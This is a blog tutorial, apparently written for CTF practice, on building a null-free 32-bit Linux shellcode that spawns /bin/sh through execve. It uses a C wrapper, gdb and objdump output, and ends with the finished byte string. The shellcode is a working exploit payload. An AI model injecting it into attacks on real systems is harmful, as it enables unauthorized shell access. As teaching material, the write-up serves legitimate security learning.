Written: 2017-09-02 | Technology Ctf
Updated: 2024-12-11

I wrote this blog post with a simple goal in mind: I never took the time to understand fully how a shellcode worked. I know about it, I know that it works, but I don’t know how. So I made myself write this in order to finally grasp its logic. Ready? Let’s dig in!

For this article I’m using a Ubuntu Trusty 32bits (with Vagrant).

The wrapper 🔗

In order to execute a shellcode, we’re going to use a simple wrapper, written in C. Later in the blog post, I’ll assume that only shellcode changes, so I’ll only reference it.

// shellcode.c
const char shellcode[] = "/* shellcode here */";

int main(){
    (*(void(*)()) shellcode)();
    return 0;
}

Let’s study this line:

(
    *(
        void(*)()
    ) shellcode
)();

The (...)(); wrap the function definition and calls it, we could have done something like:

void function = (...)
function();

void(*)()

This is the function pointer definition, it’s saying:

Define a function without name, without argument and without return value.

And finally:

*(...) shellcode

This will tell what are the instructions to execute when the function is called.

Let’s do a simple example:

shellcode = "\x90\x90\x90\x90";

Just 4 NOP operations, let’s compile and

$ gcc -o shellcode shellcode.c
$ gdb -q ./shellcode
Reading symbols from ./shellcode...(no debugging symbols found)...done.
(gdb) disass main
Dump of assembler code for function main:
   0x080483ed <+0>:     push   %ebp
   0x080483ee <+1>:     mov    %esp,%ebp
   0x080483f0 <+3>:     and    $0xfffffff0,%esp
   0x080483f3 <+6>:     mov    $0x80484a0,%eax
   0x080483f8 <+11>:    call   *%eax
   0x080483fa <+13>:    mov    $0x0,%eax
   0x080483ff <+18>:    leave
   0x08048400 <+19>:    ret
End of assembler dump.
(gdb) x/4i 0x80484a0
   0x80484a0 <shellcode>:       nop
   0x80484a1 <shellcode+1>:     nop
   0x80484a2 <shellcode+2>:     nop
   0x80484a3 <shellcode+3>:     nop

The interesting part here is to notice

   0x080483f3 <+6>:     mov    $0x80484a0,%eax
   0x080483f8 <+11>:    call   *%eax

This is setting the address of our shellcode into $eax and calling it. This call instruction will jump to the first instruction at the specified address. This won’t work with the current shellcode, it’s just to show the flow of the wrapper.

Spawning a shell 🔗

Our main exercise here will be to spawn a shell, it is a straightforward, yet powerful, way to control a machine. While techniques to have the shellcode in memory are numerous, it’s not our focus here, I recommend you read the references links provided. We’ll assume that we can execute the shellcode, and we’re only interested in its underlying mechanism.

In C, to spawn a shell there are different methods, you can use the system function, e.g.:

system("/bin/sh");

Another solution is to use execve:

execve("/bin/sh", argv, envp);

We will look at execve, because it replaces the current process and is simpler than system (see differences here and here).

Execve in ASM 🔗

To call execve we will use the famous int 0x80 which transfer the flow of the program to the kernel to execute the defined system call. (c.f.).

int 0x80 requires the interrupt number in the $eax register, to find the one we want we can run:

$ cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep execve
#define __NR_execve 11

We can already write the last two instructions of our shellcode:

...
mov eax, 0xb
int 0x80

Now we need to study how execve works to setup the correct elements on the stack, here is the function definition:

int execve(const char *filename, char *const argv[], char *const envp[]);

The first argument is a string, or as C likes to call it “a one-dimensional array of characters terminated by a null character”. The second and third arguments are arrays of strings. The first one is the list of arguments the program will receive, for example:

// execve_ls.c
int main(){
    char *filename = "/bin/ls";
    char *argv[3];

    argv[0] = "/bin/ls";
    argv[1] = "/";
    argv[2] = 0;

    execve(filename, argv, 0);
    return 0;
}

The first argument of argv is by convention started with the name of the current filename being executed.

$ gcc -o execve_ls execve_ls.c
$ ./execve_ls
bin   dev  home        lib         media  opt   root  sbin  sys  usr      var
...

Now we’re interested in /bin/sh and not /bin/ls, but it works just the same. We can actually removes the argv and envp from our test:

// execve_sh.c
int main(){
    execve("/bin/sh", 0, 0);
    return 0;
}

$ gcc -o execve_sh execve_sh.c
$ ./execve_sh
$ exit # the new shell
$

Note that in the following shellcode, we’ll explicitly set argv (and its corresponding register ecx) to 0, otherwise it’ll try to read from the pointed address and can cause troubles.

Stack and register 🔗

Before going any further I need to introduce a concept: the calling convention. Depending on your kernel, how function calling works may change. The two main ways of doing that are:

Pass every argument on the stack
Pass some argument on registers (FastCall)

It’s important to know what to do, because you may not have the right kernel for the right calling convention. The compiler usually makes that transparent for you, but because we’re doing our ASM by hand, we need to know which one works.

Simple example, using the registers to call exit (syscall 1) with the return value 1:

// exit.asm
section .text
	global _start

_start:
	mov eax, 1
	mov ebx, eax
	int 0x80

$ nasm -f elf exit.asm && ld -o exit exit.o
$ ./exit
$ echo $?
1

Now with the stack:

// exit.asm
section .text
	global _start

_start:
	push 1
	push 1
	int 0x80

$ nasm -f elf exit.asm && ld -o exit exit.o
$ ./exit
Segmentation fault (core dumped)

For this example we’ll use the Fastcall convention, but it can be adapted easily.

String’s address 🔗

This is an interesting part of the shellcode building. We know the string we want to reference, and we need to get its address somehow. We could store the string in the environment variables, or somewhere else in the program’s memory, but it would be quite random to access it. Instead, we want to store the string inside the shellcode.

Let’s see two techniques to do that:

Call 🔗

The call instruction ASM is commonly used to jump to another part of the program’s flow, but in addition to that, it pushes the next instruction’s address into the stack. To place bytes into the shellcode, we can use the db commands which places that bytes in the executable:

// call_example.asm
section .text
    global _start

_start:
    jmp toCall

main:
    pop eax
    ; eax now contains the string address
    ; ...

toCall:
    call main
    db "/bin/sh"

$ nasm -f elf call_example.asm
$ ld -o call_example call_example.o
$ gdb -q call_example
Reading symbols from call_example...(no debugging symbols found)...done.
(gdb) disass toCall
Dump of assembler code for function toCall:
   0x08048063 <+0>:     call   0x8048062 <main>
   0x08048068 <+5>:     das
   0x08048069 <+6>:     bound  %ebp,0x6e(%ecx)
   0x0804806c <+9>:     das
   0x0804806d <+10>:    jae    0x80480d7
End of assembler dump.
(gdb) x/s 0x08048068
0x8048068 <toCall+5>:   "/bin/sh"<error: Cannot access memory at address 0x804806f>
(gdb) disass main
Dump of assembler code for function main:
   0x08048062 <+0>:     pop    %eax
End of assembler dump.
(gdb) b *0x08048062
Breakpoint 1 at 0x8048062
(gdb) r
Starting program: /home/n4/learning/call_example
Breakpoint 1, 0x08048062 in main ()
(gdb) x/wx $esp
0xbffff74c:     0x08048068
(gdb) ni
0x08048063 in toCall ()
(gdb) x $eax
0x8048068 <toCall+5>:   0x6e69622f
(gdb) x/s $eax
0x8048068 <toCall+5>:   "/bin/sh"

Here you can see we can access the string from eax, and the strange instructions in toCall are just gdb interpreting the string as instructions:

   0x08048068 <+5>:     das
   0x08048069 <+6>:     bound  %ebp,0x6e(%ecx)
   0x0804806c <+9>:     das
   0x0804806d <+10>:    jae    0x80480d7

Push & Save ESP 🔗

Another technique is to push the string to the stack and get back the value of $esp after this operation. As you saw previously:

(gdb) x $eax
0x8048068 <toCall+5>:   0x6e69622f
(gdb) x/s $eax
0x8048068 <toCall+5>:   "/bin/sh"

In memory we don’t store the string, but rather the numeric representation of the string. The computer doesn’t care how we add the data in memory, so we could just push data directly to the stack:

0x8048068 <toCall+5>:   "/bin/sh"
(gdb) x/2xw $eax
0x8048068 <toCall+5>:   0x6e69622f      0x0068732f

You can see already that we have a 0x00 byte here, which is never a good idea in an exploit string (because it represents the end of a string, so it could cut the string in half). Instead we can use //bin/sh or /bin//sh which are both valid:

(gdb) print /x "/bin//sh"
$2 = {0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x73, 0x68, 0x0}

So our two values are: 0x6e69622f and 0x68732f2f. We need to push the second one before, because the second one to be pushed will be the first to be read (the stack is a LIFO):

// push_example.asm
section .text
    global _start

_start:
    push 0x68732f2f
    push 0x6e69622f
    mov eax, esp

You can see, once we pushed those values in the stack, $esp will point to the string, so we can store it somewhere else. Let’s look at that under gdb:

$ nasm -f elf push_example.asm
$ ld -o push_example push_example.o
$ gdb -q push_example
Reading symbols from push_example...(no debugging symbols found)...done.
(gdb) disass _start
Dump of assembler code for function _start:
   0x08048060 <+0>:     push   $0x68732f2f
   0x08048065 <+5>:     push   $0x6e69622f
   0x0804806a <+10>:    mov    %esp,%eax
End of assembler dump.
(gdb) b *0x0804806a
Breakpoint 1 at 0x804806a
(gdb) r
Starting program: /home/n4/learning/push_example
Breakpoint 1, 0x0804806a in _start ()
(gdb) x/4wx $esp
0xbffff748:     0x6e69622f      0x68732f2f      0x00000001      0xbffff88b
(gdb) x/s $esp
0xbffff748:     "/bin//sh\001"
(gdb) ni
0x0804806c in ?? ()
(gdb) x $eax
0xbffff748:     "/bin//sh\001"

So you can see we successfully got the address of the string in $eax again.

Quick note: because the following memory byte was not null, it was taken as being part of the string, we’ll need to fix that later, by pushing 0 to the stack first.

Writing the shellcode 🔗

We’re going to use the second method, which is simpler and shorter to write. When writing a shellcode, because you’re trying to overflow memory you aren’t supposed to use, it’s always a good idea to have the shortest payload possible.

Pseudo-ASM 🔗

Let’s go back to our interrupt and move up to what we need to have in the registers:

push 0
push string
push 0
mov ebx, string_address
mov ecx, 0
mov eax, 0xb
int 0x80

We can already replace a few instructions:

push 0
push 0x68732f2f
push 0x6e69622f
push 0
mov ebx, string_address
mov ecx, 0
mov eax, 0xb
int 0x80

Now every time we push something on the stack $esp changes, so we need to get its value right after the string:

// shellcode.asm
section .text
    global _start

_start:
    push 0
    push 0x68732f2f
    push 0x6e69622f
    mov  eax, esp
    push 0
    mov ebx, eax
    mov ecx, 0
    mov eax, 0xb
    int 0x80

And we have it! Let’s try this now:

$ nasm -f elf shellcode.asm && ld -o shellcode shellcode.o
$ ./shellcode
$ exit
$

Shellcode cleanup 🔗

Nice! Let’s have a look at our shellcode with objdump:

shellcode:     file format elf32-i386

Contents of section .text:
 8048060 6a00682f 2f736868 2f62696e 89e06a00  j.h//shh/bin..j.
 8048070 89c3b900 000000b8 0b000000 cd80      ..............

That’s quite nice, but there are a few 00 here, let’s have a closer look:

$ objdump -d shellcode

shellcode:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:       6a 00                   push   $0x0
 8048062:       68 2f 2f 73 68          push   $0x68732f2f
 8048067:       68 2f 62 69 6e          push   $0x6e69622f
 804806c:       89 e0                   mov    %esp,%eax
 804806e:       6a 00                   push   $0x0
 8048070:       89 c3                   mov    %eax,%ebx
 8048072:       b9 00 00 00 00          mov    $0x0,%ecx
 8048077:       b8 0b 00 00 00          mov    $0xb,%eax
 804807c:       cd 80                   int    $0x80

So we have twice a problem with push 0x0, and once with mov 0xb, eax.

Push 🔗

We can’t have any 0 displayed in the asm code, but we have a few cards in our hand. Using a register, and making sure it’s empty, we can then push its value onto the stack. One of the simplest way is to use the xor command like so:

xor eax, eax

This will xor eax with itself and thus put 0 into this register, we can now push it to the stack:

xor eax, eax
push eax

We need to the other one but we have a problem: we’re changing eax value, so we can’t push it again.

If you look closely you can see that we can optimize our shellcode while solving this problem:

mov  eax, esp
push 0
mov ebx, eax

Is changed to:

mov  ebx, esp
push eax

We never really needed to move esp to eax if it was to move it to ebx later. Shorter code!

Mov 🔗

Firstly, we want to set ecx to 0, the easiest way is to xor it, as we saw previously.

Now we want to set eax to 11, but the mov command will actually modify the full 4 bytes of the register, and needs to specify the 4 bytes (see the 3 00 and the unique 0b).

We could inc eax 11 times, but that would be really long!

Instead we can use the al register, which is the last 8 bits of the eax register:

64   32   16   8   0
            [AH][AL]
        [EAX       ]
[RAX               ]

So with all that, we can just replace

mov eax, 11

with

mov al, 11

And here’s the final payload

section .text
    global _start

_start:
    xor  eax, eax
    push eax
    push 0x68732f2f
    push 0x6e69622f
    mov  ebx, esp
    xor  ecx, ecx
    mov  al, 0xb
    int  0x80

It’s a little bit shorter than the previous one, but the real occurs when you look at the generated shellcode:

$ objdump -s shellcode

shellcode:     file format elf32-i386

Contents of section .text:
 8048060 31c05068 2f2f7368 682f6269 6e89e331  1.Ph//shh/bin..1
 8048070 c9b00bcd 80                          .....

Wrapping up 🔗

We have our hex instructions, let’s put that in our wrapper. Here’s a swift way to convert your hex string to the proper format with vim:

31c050682f2f7368682f62696e89e331c9b00bcd80

:s/\(..\)/\\x\1/g

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80";

$ gcc -o shellcode shellcode.c
$ ./shellcode
$ # new shell

References: